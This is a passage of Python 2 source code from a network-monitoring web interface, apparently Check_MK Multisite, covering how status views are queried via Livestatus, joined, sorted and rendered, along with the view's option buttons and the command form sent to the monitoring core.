        if len(join_painters) > 0:
            do_table_join(datasource, rows, filterheaders, join_painters, join_columns, only_sites)

        # Add inventory data if one of the painters or filters needs it
        if need_inventory_data:
            for row in rows:
                if "host_name" in row:
                    row["host_inventory"] = inventory.host(row["host_name"])

        sort_data(rows, sorters)
    else:
        rows = []

    # Apply non-Livestatus filters
    for filter in all_active_filters:
        rows = filter.filter_table(rows)

    if html.var("mode") == "availability":
        render_bi_availability(view_title(view), rows)
        return

    # TODO: Use livestatus Stats: instead of fetching rows!
    if only_count:
        for fname, filter_vars in view["context"].items():
            for varname, value in filter_vars.items():
                html.del_var(varname)
        return len(rows)

    # The layout of the view: it can be overridden by several specifying
    # an output format (like json or python). Note: the layout is not
    # always needed. In case of an embedded view in the reporting this
    # field is simply missing, because the rendering is done by the
    # report itself.
    # TODO: CSV export should be handled by the layouts. It cannot
    # be done generic in most cases
    if html.output_format == "html":
        if "layout" in view:
            layout = multisite_layouts[view["layout"]]
        else:
            layout = None
    else:
        if "layout" in view and "csv_export" in multisite_layouts[view["layout"]]:
            multisite_layouts[view["layout"]]["csv_export"](rows, view, group_painters, painters)
            return
        else:
            # Generic layout of export
            layout = multisite_layouts.get(html.output_format)
            if not layout:
                layout = multisite_layouts["json"]

    # Set browser reload
    if browser_reload and 'R' in display_options and not only_count:
        html.set_browser_reload(browser_reload)

    # Until now no single byte of HTML code has been output.
    # Now let's render the view. The render_function will be
    # replaced by the mobile interface for an own version.
    if not render_function:
        render_function = render_view

    render_function(view, rows, datasource, group_painters, painters,
                display_options, painter_options, show_heading, show_buttons,
                show_checkboxes, layout, num_columns, show_filters, show_footer,
                browser_reload)
# Output HTML code of a view. If you add or remove paramters here,
# then please also do this in htdocs/mobile.py!
def render_view(view, rows, datasource, group_painters, painters,
                display_options, painter_options, show_heading, show_buttons,
                show_checkboxes, layout, num_columns, show_filters, show_footer,
                browser_reload):
    """Output HTML code of a view: heading, buttons, filter/command/option
    forms, the actual data table (via the layout's render function) and
    the footer.

    If you add or remove parameters here, then please also do this in
    htdocs/mobile.py!
    """
    if html.transaction_valid() and html.do_actions():
        html.set_browser_reload(0)

    # Show heading (change between "preview" mode and full page mode)
    if show_heading:
        # Show/Hide the header with page title, MK logo, etc.
        if 'H' in display_options:
            # FIXME: view/layout/module related stylesheets/javascripts e.g. in case of BI?
            html.body_start(view_title(view), stylesheets=["pages","views","status","bi"])
        if 'T' in display_options:
            html.top_heading(view_title(view))

    has_done_actions = False
    row_count = len(rows)

    # This is a general flag which makes the command form render when the current
    # view might be able to handle commands. When no commands are possible due missing
    # permissions or datasources without commands, the form is not rendered
    command_form = should_show_command_form(display_options, datasource)
    if command_form:
        weblib.init_selection()

    # Is the layout able to display checkboxes?
    can_display_checkboxes = layout.get('checkboxes', False)

    if show_buttons:
        show_context_links(view, show_filters, display_options,
                       painter_options,
                       # Take into account: permissions, display_options
                       row_count > 0 and command_form,
                       # Take into account: layout capabilities
                       can_display_checkboxes and not view.get("force_checkboxes"), show_checkboxes,
                       # Show link to availability
                       datasource["table"] in [ "hosts", "services" ] or "aggr" in datasource["infos"])

    # User errors in filters
    html.show_user_errors()

    # Filter form
    filter_isopen = view.get("mustsearch") and not html.var("filled_in")
    if 'F' in display_options and len(show_filters) > 0:
        show_filter_form(filter_isopen, show_filters)

    # Actions
    if command_form:
        # If we are currently within an action (confirming or executing), then
        # we display only the selected rows (if checkbox mode is active)
        if show_checkboxes and html.do_actions():
            rows = filter_selected_rows(view, rows, weblib.get_rowselection('view-' + view['name']))

        # There are one shot actions which only want to affect one row, filter the rows
        # by this id during actions
        if html.has_var("_row_id") and html.do_actions():
            rows = filter_by_row_id(view, rows)

        if html.do_actions() and html.transaction_valid(): # submit button pressed, no reload
            try:
                # Create URI with all actions variables removed
                backurl = html.makeuri([], delvars=['filled_in', 'actions'])
                has_done_actions = do_actions(view, datasource["infos"][0], rows, backurl)
            except MKUserError, e:
                html.show_error(e)
                html.add_user_error(e.varname, e)
                if 'C' in display_options:
                    show_command_form(True, datasource)

        elif 'C' in display_options: # (*not* display open, if checkboxes are currently shown)
            show_command_form(False, datasource)

    # Also execute commands in cases without command form (needed for Python-
    # web service e.g. for NagStaMon)
    elif row_count > 0 and config.may("general.act") \
         and html.do_actions() and html.transaction_valid():

        # There are one shot actions which only want to affect one row, filter the rows
        # by this id during actions
        if html.has_var("_row_id") and html.do_actions():
            rows = filter_by_row_id(view, rows)

        try:
            do_actions(view, datasource["infos"][0], rows, '')
        except:
            pass # currently no feed back on webservice

    if 'O' in display_options and len(painter_options) > 0 and config.may("general.painter_options"):
        show_painter_options(painter_options)

    # The refreshing content container
    if 'R' in display_options:
        html.write("<div id=data_container>\n")

    if not has_done_actions:
        # Limit exceeded? Show warning
        if 'W' in display_options:
            html.check_limit(rows, get_limit())
        layout["render"](rows, view, group_painters, painters, num_columns,
                         show_checkboxes and not html.do_actions())
        headinfo = "%d %s" % (row_count, row_count == 1 and _("row") or _("rows"))
        if show_checkboxes:
            selected = filter_selected_rows(view, rows, weblib.get_rowselection('view-' + view['name']))
            headinfo = "%d/%s" % (len(selected), headinfo)

        if html.output_format == "html":
            html.javascript("update_headinfo('%s');" % headinfo)

            # The number of rows might have changed to enable/disable actions and checkboxes
            if show_buttons:
                update_context_links(
                    # don't take display_options into account here ('c' is set during reload)
                    row_count > 0 and should_show_command_form('C', datasource),
                    # and not html.do_actions(),
                    can_display_checkboxes
                )

            # Play alarm sounds, if critical events have been displayed
            if 'S' in display_options and view.get("play_sounds"):
                play_alarm_sounds()
    else:
        # Always hide action related context links in this situation
        update_context_links(False, False)

    # In multi site setups error messages of single sites do not block the
    # output and raise now exception. We simply print error messages here.
    # In case of the web service we show errors only on single site installations.
    if config.show_livestatus_errors \
       and 'W' in display_options \
       and (html.output_format == "html" or not config.is_multisite()):
        for sitename, info in html.live.deadsites.items():
            html.show_error("<b>%s - %s</b><br>%s" % (info["site"]["alias"], _('Livestatus error'), info["exception"]))

    # FIXME: It would be cleaner to also include the status icons here
    if 'R' in display_options:
        html.write("</div>\n")

    if show_footer:
        pid = os.getpid()
        if html.live.successfully_persisted():
            html.add_status_icon("persist", _("Reused persistent livestatus connection from earlier request (PID %d)") % pid)
        if bi.reused_compilation():
            html.add_status_icon("aggrcomp", _("Reused cached compiled BI aggregations (PID %d)") % pid)

        if config.may('wato.users'):
            try:
                msg = file(defaults.var_dir + '/web/ldap_sync_fail.mk').read()
                html.add_status_icon("ldap", _('Last LDAP sync failed! %s') % html.attrencode(msg))
            except IOError:
                pass

        html.bottom_focuscode()
        if 'Z' in display_options:
            html.bottom_footer()

        if 'H' in display_options:
            html.body_end()
# We should rename this into "painter_options". Also the saved file.
def view_options(viewname):
    """Load the persisted painter options of one view and merge in any
    new values transported via HTML variables (prefix "po_").

    Returns the per-view option dict. Also mirrors the current values
    into multisite_painter_options[...]['value'] so the painters can
    access them globally. Persists the merged options when something
    changed and the user has the "painter_options" permission.
    """
    # Options are stored per view. Get all options for all views
    vo = config.load_user_file("viewoptions", {})
    # Now get options for the view in question
    v = vo.get(viewname, {})
    must_save = False

    # Now override the loaded options with new option settings that are
    # provided by the URL. Our problem: we do not know the URL variables
    # that a valuespec expects. But we know the common prefix of all
    # variables for each option.
    if config.may("general.painter_options"):
        for option_name, opt in multisite_painter_options.items():
            have_old_value = option_name in v
            if have_old_value:
                old_value = v.get(option_name)

            # Are there settings for this painter option present?
            var_prefix = 'po_' + option_name
            if html.has_var_prefix(var_prefix):

                # Get new value for the option from the value spec
                vs = opt['valuespec']
                value = vs.from_html_vars(var_prefix)

                v[option_name] = value
                opt['value'] = value # make globally present for painters

                if not have_old_value or v[option_name] != old_value:
                    must_save = True

            elif have_old_value:
                opt['value'] = old_value # make globally present for painters

            elif 'value' in opt:
                del opt['value'] # no value known for this painter option

    # If the user has no permission for changing painter options
    # (or has *lost* his permission) then we need to remove all
    # of the options. But we do not save.
    # NOTE(review): despite the comment above, removing an option sets
    # must_save and the file *is* written below - confirm intent.
    else:
        for on, opt in multisite_painter_options.items():
            if on in v:
                del v[on]
                must_save = True
            if 'value' in opt:
                del opt['value']

    if must_save:
        vo[viewname] = v
        config.save_user_file("viewoptions", vo)

    return v
def do_table_join(master_ds, master_rows, master_filters, join_painters, join_columns, only_sites):
    # Fetch the rows of the joined table (e.g. services while in a host
    # view) and attach them to each master row in the artificial column
    # "JOIN", keyed by the join key (e.g. the service description).
    join_table, join_master_column = master_ds["join"]
    slave_ds = multisite_datasources[join_table]
    join_slave_column = slave_ds["joinkey"]

    # Restrict the slave query to the join keys actually referenced by
    # the join painters (OR-ed together)
    filter_lines = [ "Filter: %s = %s\n" % (join_slave_column, entry[3])
                     for entry in join_painters ]
    filter_lines.append("Or: %d\n" % len(join_painters))
    query = master_filters + "".join(filter_lines)

    rows = query_data(slave_ds, [join_master_column, join_slave_column] + join_columns,
                      [], query, only_sites, None)

    # Group the slave rows by their (site, master key). The rows arrive
    # ordered by master key, so a new bucket is started whenever the key
    # changes.
    per_master_entry = {}
    last_key = None
    bucket = None
    for row in rows:
        master_key = (row["site"], row[join_master_column])
        if master_key != last_key:
            last_key = master_key
            bucket = {}
            per_master_entry[master_key] = bucket
        bucket[row[join_slave_column]] = row

    # Add this information into master table in artificial column "JOIN"
    for row in master_rows:
        row["JOIN"] = per_master_entry.get((row["site"], row[join_master_column]), {})
def play_alarm_sounds():
    # Play at most one alarm sound, if sounds are enabled and one of the
    # configured events occurred while rendering this page.
    if not config.enable_sounds:
        return

    base_url = config.sound_url
    if not base_url.endswith("/"):
        base_url = base_url + "/"

    # The first matching entry wins; an empty event matches always
    for event, wav in config.sounds:
        if not event or html.has_event(event):
            html.play_sound(base_url + wav)
            break
# How many data rows may the user query?
def get_limit():
    # How many data rows may the user query? Depends on the "limit" URL
    # variable and on the user's permissions to raise/drop the limits.
    requested = html.var("limit", "soft")
    if requested == "hard" and config.may("general.ignore_soft_limit"):
        return config.hard_query_limit
    if requested == "none" and config.may("general.ignore_hard_limit"):
        return None # no limit at all
    return config.soft_query_limit
def view_title(view):
    # Title of a view (delegates to the generic visuals title handling)
    return visuals.visual_title('view', view)
def view_optiondial(view, option, choices, help):
    # Render a "dial" button that cycles through the choices of a view
    # option (e.g. number of columns or the refresh interval).
    persisted = view_options(view["name"])

    # Darn: The option "refresh" has the name "browser_reload" in the
    # view definition
    view_key = option == "refresh" and "browser_reload" or option
    value = persisted.get(option, view.get(view_key, choices[0][0]))
    title = dict(choices).get(value, value)

    html.begin_context_buttons() # just to be sure

    # Remove unicode strings (choices end up in a JS literal via %r)
    choices = [ [c[0], str(c[1])] for c in choices ]
    html.write('<div title="%s" id="optiondial_%s" class="optiondial %s val_%s" '
       'onclick="view_dial_option(this, \'%s\', \'%s\', %r);"><div>%s</div></div>' % (
        help, option, option, value, view["name"], option, choices, title))
    html.final_javascript("init_optiondial('optiondial_%s');" % option)
def view_optiondial_off(option):
    # Render a disabled (greyed out) placeholder for an option dial
    html.write('<div class="optiondial off %s"></div>' % option)
# FIXME: Consolidate toggle rendering functions
# FIXME: Consolidate toggle rendering functions
def toggler(id, icon, help, onclick, value, hidden = False):
    # Render a two-state toggle button with a custom onclick handler.
    html.begin_context_buttons() # just to be sure
    state_class = value and "down" or "up"
    style = hidden and ' style="display:none"' or ''
    html.write('<div id="%s_on" title="%s" class="togglebutton %s %s" '
               'onclick="%s"%s><img src="images/icon_%s.png"></div>' % (
        id, help, icon, state_class, onclick, style, icon))
# Will be called when the user presses the upper button, in order
# to persist the new setting - and to make it active before the
# browser reload of the DIV containing the actual status data is done.
def ajax_set_viewoption():
    """AJAX handler: persist one view option (e.g. number of columns or
    refresh interval) of a view for the current user.

    Reads "view_name", "option" and "value" from the URL, converts the
    transported string back to a Python value (booleans arrive as
    "true"/"false", numbers as digit strings) and stores it in the
    user's "viewoptions" file.
    """
    view_name = html.var("view_name")
    option = html.var("option")
    value = html.var("value")
    value = { 'true' : True, 'false' : False }.get(value, value)
    # value[:1] instead of value[0]: avoids an IndexError when an empty
    # value is transmitted
    if type(value) == str and value[:1].isdigit():
        try:
            value = int(value)
        except ValueError:
            # e.g. "1abc" - keep the raw string (was a bare except before,
            # which would also have swallowed unrelated errors)
            pass

    vo = config.load_user_file("viewoptions", {})
    vo.setdefault(view_name, {})
    vo[view_name][option] = value
    config.save_user_file("viewoptions", vo)
# FIXME: Consolidate toggle rendering functions
def togglebutton_off(id, icon, hidden = False):
    """Render a disabled (non-clickable) toggle button."""
    html.begin_context_buttons()
    hide = hidden and ' style="display:none"' or ''
    html.write('<div id="%s_off" class="togglebutton off %s"%s>'
               '<img src="images/icon_%s.png"></div>' % (id, icon, hide, icon))
# FIXME: Consolidate toggle rendering functions
def togglebutton(id, isopen, icon, help, hidden = False):
    """Render a toggle button opening/closing the form with the given id
    via the JS function view_toggle_form()."""
    html.begin_context_buttons()
    # isopen controls whether the button is initially painted pressed
    if isopen:
        cssclass = "down"
    else:
        cssclass = "up"
    hide = hidden and ' style="display:none"' or ''
    html.write('<div id="%s_on" class="togglebutton %s %s" title="%s" '
               'onclick="view_toggle_form(this, \'%s\');"%s>'
               '<img src="images/icon_%s.png"></div>' % (id, icon, cssclass, help, id, hide, icon))
def show_context_links(thisview, show_filters, display_options,
                       painter_options, enable_commands, enable_checkboxes, show_checkboxes,
                       show_availability):
    """Render the context button row of a view page.

    Depending on the letters in display_options this paints the filter ('F'),
    painter option ('D'), command/checkbox ('C') toggle buttons, the column
    and refresh option dials ('O'/'R'), buttons to WATO / PDF export /
    related visuals ('B') and the Edit-View / Availability buttons ('E').
    """
    # html.begin_context_buttons() called automatically by html.context_button()
    # That way if no button is painted we avoid the empty container
    if 'B' in display_options:
        execute_hooks('buttons-begin')

    # The filter form is opened by default when the view requires a search
    # and no filter has been submitted yet
    filter_isopen = html.var("filled_in") != "filter" and thisview.get("mustsearch")
    if 'F' in display_options:
        if len(show_filters) > 0:
            if html.var("filled_in") == "filter":
                icon = "filters_set"
                help = _("The current data is being filtered")
            else:
                icon = "filters"
                help = _("Set a filter for refining the shown data")
            togglebutton("filters", filter_isopen, icon, help)
        else:
            togglebutton_off("filters", "filters")

    if 'D' in display_options:
        if len(painter_options) > 0 and config.may("general.painter_options"):
            togglebutton("painteroptions", False, "painteroptions", _("Modify display options"))
        else:
            togglebutton_off("painteroptions", "painteroptions")

    if 'C' in display_options:
        togglebutton("commands", False, "commands", _("Execute commands on hosts, services and other objects"),
                     hidden = not enable_commands)
        togglebutton_off("commands", "commands", hidden = enable_commands)
        selection_enabled = (enable_commands and enable_checkboxes) or thisview.get("force_checkboxes")
        if not thisview.get("force_checkboxes"):
            toggler("checkbox", "checkbox", _("Enable/Disable checkboxes for selecting rows for commands"),
                    "location.href='%s';" % html.makeuri([('show_checkboxes', show_checkboxes and '0' or '1')]),
                    show_checkboxes, hidden = True) # not selection_enabled)
        togglebutton_off("checkbox", "checkbox", hidden = not thisview.get("force_checkboxes"))
        html.javascript('g_selection_enabled = %s;' % (selection_enabled and 'true' or 'false'))

    if 'O' in display_options:
        if config.may("general.view_option_columns"):
            choices = [ [x, "%s" % x] for x in config.view_option_columns ]
            view_optiondial(thisview, "num_columns", choices, _("Change the number of display columns"))
        else:
            view_optiondial_off("num_columns")

        if 'R' in display_options and config.may("general.view_option_refresh"):
            choices = [ [x, {0:_("off")}.get(x,str(x) + "s") + (x and "" or "")] for x in config.view_option_refreshes ]
            view_optiondial(thisview, "refresh", choices, _("Change the refresh rate"))
        else:
            view_optiondial_off("refresh")

    if 'B' in display_options:
        # WATO: If we have a host context, then show button to WATO, if permissions allow this
        if html.has_var("host") \
           and config.wato_enabled \
           and config.may("wato.use") \
           and (config.may("wato.hosts") or config.may("wato.seeall")):
            host = html.var("host")
            if host:
                url = wato.link_to_host_by_name(host)
            else:
                url = wato.link_to_folder_by_path(html.var("wato_folder", ""))
            html.context_button(_("WATO"), url, "wato", id="wato",
                bestof = config.context_buttons_to_show)

        # Button for creating an instant report (if reporting is available)
        if config.reporting_available() and config.may("general.reporting"):
            html.context_button(_("Export as PDF"), html.makeuri([], filename="report_instant.py"), "report")

        # Buttons to other views, dashboards, etc.
        links = visuals.collect_context_links(thisview)
        for linktitle, uri, icon, buttonid in links:
            html.context_button(linktitle, url=uri, icon=icon, id=buttonid, bestof=config.context_buttons_to_show)

    # Customize/Edit view button
    if 'E' in display_options and config.may("general.edit_views"):
        backurl = html.urlencode(html.makeuri([]))
        if thisview["owner"] == config.user_id:
            url = "edit_view.py?load_name=%s&back=%s" % (thisview["name"], backurl)
        else:
            url = "edit_view.py?load_user=%s&load_name=%s&back=%s" % \
                  (thisview["owner"], thisview["name"], backurl)
        html.context_button(_("Edit View"), url, "edit", id="edit", bestof=config.context_buttons_to_show)

    if 'E' in display_options and show_availability:
        html.context_button(_("Availability"), html.makeuri([("mode", "availability")]), "availability")

    if 'B' in display_options:
        execute_hooks('buttons-end')

    html.end_context_buttons()
def update_context_links(enable_command_toggle, enable_checkbox_toggle):
    """Sync the command and checkbox toggle buttons with the given flags."""
    command_state = 1 if enable_command_toggle else 0
    checkbox_state = 1 if (enable_command_toggle and enable_checkbox_toggle) else 0
    html.javascript("update_togglebutton('commands', %d);" % command_state)
    html.javascript("update_togglebutton('checkbox', %d);" % checkbox_state)
def ajax_count_button():
    """AJAX endpoint: record a click on a context button.

    All stored counters decay by 5% on every click so that recently used
    buttons float to the top of the "best of" button selection.
    """
    button_id = html.var("id")
    counts = config.load_user_file("buttoncounts", {})
    for key in counts:
        counts[key] *= 0.95
    counts[button_id] = counts.get(button_id, 0) + 1
    config.save_user_file("buttoncounts", counts)
# Retrieve data via livestatus, convert into list of dicts,
# prepare row-function needed for painters
# datasource: the datasource object as defined in plugins/views/datasources.py
# columns: the list of livestatus columns to query
# add_columns: list of columns the datasource is known to add itself
# (couldn't we get rid of this parameter by looking that up ourselves?)
# add_headers: additional livestatus headers to add
# only_sites: list of sites the query is limited to
# limit: maximum number of data rows to query
def query_data(datasource, columns, add_columns, add_headers, only_sites = [], limit = None):
    """Build and execute the livestatus query of a view.

    datasource:  datasource definition from plugins/views/datasources.py
    columns:     livestatus columns to query
    add_columns: columns the datasource is known to add by itself
    add_headers: extra livestatus headers
    only_sites:  restrict the query to these sites
    limit:       maximum number of data rows
    """
    tablename = datasource["table"]
    add_headers += datasource.get("add_headers", "")

    merge_column = datasource.get("merge_by")
    if merge_column:
        columns = [merge_column] + columns

    # Layouts usually color rows by the object's state, even when no state
    # painter is configured, so always fetch the state columns. The 'log'
    # table is excluded because it cannot correctly distinguish between
    # service_state and host_state.
    if "log" not in datasource["infos"]:
        state_columns = []
        if "service" in datasource["infos"]:
            state_columns += [ "service_has_been_checked", "service_state" ]
        if "host" in datasource["infos"]:
            state_columns += [ "host_has_been_checked", "host_state" ]
        columns += [ c for c in state_columns if c not in columns ]

    # Strip columns which are implicitely added by the datasource
    columns = [ c for c in columns if c not in add_columns ]

    query = "GET %s\n" % tablename
    return do_query_data(query, columns, add_columns, merge_column,
                         add_headers, only_sites, limit)
def do_query_data(query, columns, add_columns, merge_column,
                  add_headers, only_sites, limit):
    """Execute a prepared livestatus query and return a list of dicts,
    one per row, keyed by column name (including "site").

    If limit is set, limit+1 rows are requested so the caller can detect
    that the limit was exceeded. Note the call order: the connection
    settings (prepend_site, limit, only_sites) are set before the query
    and reset directly afterwards.
    """
    query += "Columns: %s\n" % " ".join(columns)
    query += add_headers
    html.live.set_prepend_site(True)
    if limit != None:
        html.live.set_limit(limit + 1) # + 1: We need to know, if limit is exceeded

    if config.debug_livestatus_queries \
            and html.output_format == "html" and 'W' in html.display_options:
        html.write('<div class="livestatus message">'
                   '<tt>%s</tt></div>\n' % (query.replace('\n', '<br>\n')))

    if only_sites:
        html.live.set_only_sites(only_sites)
    data = html.live.query(query)
    html.live.set_only_sites(None)
    html.live.set_prepend_site(False)
    html.live.set_limit() # removes limit

    if merge_column:
        data = merge_data(data, columns)

    # Convert list-rows into dictionaries. This costs a bit of
    # performance, but makes life much easier later.
    columns = ["site"] + columns + add_columns
    rows = [ dict(zip(columns, row)) for row in data ]
    return rows
# Merge all data rows with different sites but the same value
# in merge_column. We require that all column names are prefixed
# with the tablename. The column with the merge key is required
# to be the *second* column (right after the site column)
def merge_data(data, columns):
    """Merge all data rows that have different sites but the same value
    in the merge column (required to be the second column, right after
    the site column). All column names must be prefixed with the table
    name; the merge strategy per column is chosen from the column name.

    Returns the merged rows sorted by merge key.
    """
    merged = {}
    mergefuncs = [lambda a,b: ""] # site column is not merged

    def worst_service_state(a, b):
        # CRIT (2) dominates, otherwise the numerically larger state wins
        if a == 2 or b == 2:
            return 2
        else:
            return max(a, b)

    def worst_host_state(a, b):
        # DOWN (1) dominates, otherwise the numerically larger state wins
        if a == 1 or b == 1:
            return 1
        else:
            return max(a, b)

    for c in columns:
        tablename, col = c.split("_", 1)
        if col.startswith("num_") or col.startswith("members"):
            mergefunc = lambda a,b: a+b
        elif col.startswith("worst_service"):
            # BUG FIX: this used to "return worst_service_state", aborting
            # the merge and handing back a function instead of row data.
            mergefunc = worst_service_state
        elif col.startswith("worst_host"):
            # BUG FIX: same as above, was "return worst_host_state"
            mergefunc = worst_host_state
        else:
            mergefunc = lambda a,b: a
        mergefuncs.append(mergefunc)

    for row in data:
        mergekey = row[1]
        if mergekey in merged:
            oldrow = merged[mergekey]
            merged[mergekey] = [ f(a,b) for f,a,b in zip(mergefuncs, oldrow, row) ]
        else:
            merged[mergekey] = row

    # return all rows sorted according to merge key
    return [ merged[k] for k in sorted(merged.keys()) ]
# Sort data according to list of sorters. The tablename
# is needed in order to handle different column names
# for same objects (e.g. host_name in table services and
# simply name in table hosts)
def sort_data(data, sorters):
    """Sort the rows in *data* in place according to the list of sorters.

    Each sorter is (sorter_spec, negate) or (sorter_spec, negate, joinkey)
    where joinkey selects the joined sub-row (e.g. a service description)
    the comparison is applied to. Uses a classic cmp-style multi-key sort.
    """
    if len(sorters) == 0:
        return

    # Handle case where join columns are not present for all rows
    def save_compare(compfunc, row1, row2, args):
        if row1 == None and row2 == None:
            return 0
        elif row1 == None:
            # rows without the join column sort first
            return -1
        elif row2 == None:
            return 1
        else:
            if args:
                return compfunc(row1, row2, *args)
            else:
                return compfunc(row1, row2)

    sort_cmps = []
    for s in sorters:
        cmpfunc = s[0]["cmp"]
        negate = s[1] and -1 or 1
        if len(s) > 2:
            joinkey = s[2] # e.g. service description
        else:
            joinkey = None
        sort_cmps.append((cmpfunc, negate, joinkey, s[0].get('args')))

    # Chain the comparisons: the first sorter yielding a non-zero
    # result decides the order
    def multisort(e1, e2):
        for func, neg, joinkey, args in sort_cmps:
            if joinkey: # Sorter for join column, use JOIN info
                c = neg * save_compare(func, e1["JOIN"].get(joinkey), e2["JOIN"].get(joinkey), args)
            else:
                if args:
                    c = neg * func(e1, e2, *args)
                else:
                    c = neg * func(e1, e2)
            if c != 0: return c
        return 0 # equal

    data.sort(multisort)
# Filters a list of sorters or painters and decides which of
# those are available for a certain data source
def allowed_for_datasource(collection, datasourcename):
    """Filter a dict of painters/sorters down to the entries whose needed
    infos are all provided by the given datasource."""
    datasource = multisite_datasources[datasourcename]
    infos_available = set(datasource["infos"])
    add_columns = datasource.get("add_columns", [])

    allowed = {}
    for name, item in collection.items():
        needed = set()
        for column in get_painter_columns(item):
            if column != "site" and column not in add_columns:
                needed.add(column.split("_", 1)[0])
        if needed.issubset(infos_available):
            allowed[name] = item
    return allowed
def allowed_for_joined_datasource(collection, datasourcename):
    """Like allowed_for_datasource(), but applied to the datasource's
    join table (empty result if the datasource has no join)."""
    datasource = multisite_datasources[datasourcename]
    if 'join' not in datasource:
        return {}
    join_source = datasource['join'][0]
    return allowed_for_datasource(collection, join_source)
def collist_of_collection(collection, join_target = None):
    """Return the (name, title) choice pairs of *collection*, sorted by
    display title.

    If join_target is given, pairs already contained in it are left out.
    The default was changed from a mutable [] to the None sentinel
    (read-only before, but mutable defaults are an accident waiting to
    happen); passing [] still behaves identically.
    """
    def sort_list(l):
        # Sort by display title but keep returning (key, title) pairs
        swapped = [ (disp, key) for key, disp in l ]
        swapped.sort()
        return [ (key, disp) for disp, key in swapped ]

    pairs = [ (name, p["title"]) for name, p in collection.items() ]
    if join_target:
        pairs = [ pair for pair in pairs if pair not in join_target ]
    return sort_list(pairs)
#.
# .--Commands------------------------------------------------------------.
# | ____ _ |
# | / ___|___ _ __ ___ _ __ ___ __ _ _ __ __| |___ |
# | | | / _ \| '_ ` _ \| '_ ` _ \ / _` | '_ \ / _` / __| |
# | | |__| (_) | | | | | | | | | | | (_| | | | | (_| \__ \ |
# | \____\___/|_| |_| |_|_| |_| |_|\__,_|_| |_|\__,_|___/ |
# | |
# +----------------------------------------------------------------------+
# | Functions dealing with external commands send to the monitoring |
# | core. The commands themselves are defined as a plugin. Shipped |
# | command definitions are in plugins/views/commands.py. |
# | We apologize for the fact that we one time speak of "commands" and |
# | the other time of "action". Both is the same here... |
# '----------------------------------------------------------------------'
# Checks wether or not this view handles commands for the current user
# When it does not handle commands the command tab, command form, row
# selection and processing commands is disabled.
def should_show_command_form(display_options, datasource):
    """Decide whether this view offers commands to the current user.

    When False, the command tab, command form, row selection and command
    processing are disabled.
    """
    if 'C' not in display_options:
        return False
    if not config.may("general.act"):
        return False
    if html.has_var("try"):
        return False

    # What commands are available depends on the Livestatus table we
    # deal with. The first info of the datasource is the primary table,
    # so 'what' is one of "host", "service", "command" or "downtime".
    what = datasource["infos"][0]
    return any(what in command["tables"] and config.may(command["permission"])
               for command in multisite_commands)
def show_command_form(is_open, datasource):
    """Render the (optionally hidden) command form of a view, grouping
    all applicable commands by their optional "group" attribute."""
    # What commands are available depends on the Livestatus table we
    # deal with. If a data source provides information about more
    # than one table, (like services datasource also provide host
    # information) then the first info is the primary table. So 'what'
    # will be one of "host", "service", "command" or "downtime".
    what = datasource["infos"][0]

    html.write('<div class="view_form" id="commands" %s>' %
                (not is_open and 'style="display: none"' or '') )
    html.begin_form("actions")
    html.hidden_field("_do_actions", "yes")
    html.hidden_field("actions", "yes")
    html.hidden_fields() # set all current variables, exception action vars

    # Show command forms, grouped by (optional) command group
    by_group = {}
    for command in multisite_commands:
        if what in command["tables"] and config.may(command["permission"]):
            # Some special commands can be shown on special views using this option.
            # It is currently only used in custom views, not shipped with check_mk.
            if command.get('only_view') and html.var('view_name') != command['only_view']:
                continue
            group = command.get("group", _("Various Commands"))
            by_group.setdefault(group, []).append(command)

    groups = by_group.keys()
    groups.sort()
    for group in groups:
        forms.header(group, narrow=True)
        for command in by_group[group]:
            forms.section(command["title"])
            command["render"]()

    forms.end()
    html.end_form()
    html.write("</div>")
# Examine the current HTML variables in order determine, which
# command the user has selected. The fetch ids from a data row
# (host name, service description, downtime/commands id) and
# construct one or several core command lines and a descriptive
# title.
def core_command(what, row, row_nr, total_rows):
    """Translate the current HTML command variables into core commands.

    Fetches the object spec (host name, service description, id) from the
    data row and asks every permitted command plugin whether it feels
    responsible. Returns (commands, title, executor). Raises MKUserError
    when no command matched (title stays None in that case, so executor
    is only referenced after a successful match).
    """
    host = row.get("host_name")
    descr = row.get("service_description")

    if what == "host":
        spec = host
        cmdtag = "HOST"
    elif what == "service":
        spec = "%s;%s" % (host, descr)
        cmdtag = "SVC"
    else:
        # "command"/"downtime" rows: use the object's id as spec
        spec = row.get(what + "_id")
        if descr:
            cmdtag = "SVC"
        else:
            cmdtag = "HOST"

    commands = None
    title = None
    # Call all command actions. The first one that detects
    # itself to be executed (by examining the HTML variables)
    # will return a command to execute and a title for the
    # confirmation dialog.
    for cmd in multisite_commands:
        if config.may(cmd["permission"]):
            # Does the command need information about the total number of rows
            # and the number of the current row? Then specify that
            if cmd.get("row_stats"):
                result = cmd["action"](cmdtag, spec, row, row_nr, total_rows)
            else:
                result = cmd["action"](cmdtag, spec, row)
            if result:
                executor = cmd.get("executor", command_executor_livestatus)
                commands, title = result
                break

    # Use the title attribute to determine if a command exists, since the list
    # of commands might be empty (e.g. in case of "remove all downtimes" where)
    # no downtime exists in a selection of rows.
    if not title:
        raise MKUserError(None, _("Sorry. This command is not implemented."))

    # Some commands return lists of commands, others
    # just return one basic command. Convert those
    if type(commands) != list:
        commands = [commands]

    return commands, title, executor
def command_executor_livestatus(command, site):
    """Send a timestamped external command to the core via Livestatus."""
    timestamp = int(time.time())
    html.live.command("[%d] %s" % (timestamp, command), site)
# Make gettext localize some magic texts that are only referenced
# dynamically at runtime.
# NOTE(review): presumably these match info titles looked up elsewhere
# (e.g. title_plural) - confirm before removing any of them.
_("services")
_("hosts")
_("commands")
_("downtimes")
_("aggregations")
# Returns:
# True -> Actions have been done
# False -> No actions done because now rows selected
# [...] new rows -> Rows actions (shall/have) be performed on
def do_actions(view, what, action_rows, backurl):
    """Execute the selected command on all given rows.

    Returns True when the action phase completed (commands sent or a
    result message shown) and False when nothing was done (missing
    permission, no rows selected, or confirmation denied).
    """
    if not config.may("general.act"):
        html.show_error(_("You are not allowed to perform actions. "
                          "If you think this is an error, please ask "
                          "your administrator grant you the permission to do so."))
        return False # no actions done

    if not action_rows:
        message = _("No rows selected to perform actions for.")
        if html.output_format == "html": # sorry for this hack
            message += '<br><a href="%s">%s</a>' % (backurl, _('Back to view'))
        html.show_error(message)
        return False # no actions done

    command = None
    # Probe the first row only to obtain title and executor for the
    # confirmation dialog
    title, executor = core_command(what, action_rows[0], 0, len(action_rows))[1:3] # just get the title and executor
    if not html.confirm(_("Do you really want to %(title)s the following %(count)d %(what)s?") %
            { "title" : title, "count" : len(action_rows), "what" : visuals.infos[what]["title_plural"], }, method = 'GET'):
        return False

    count = 0
    # Deduplicate by (site, command) so the same command is not sent twice
    already_executed = set([])
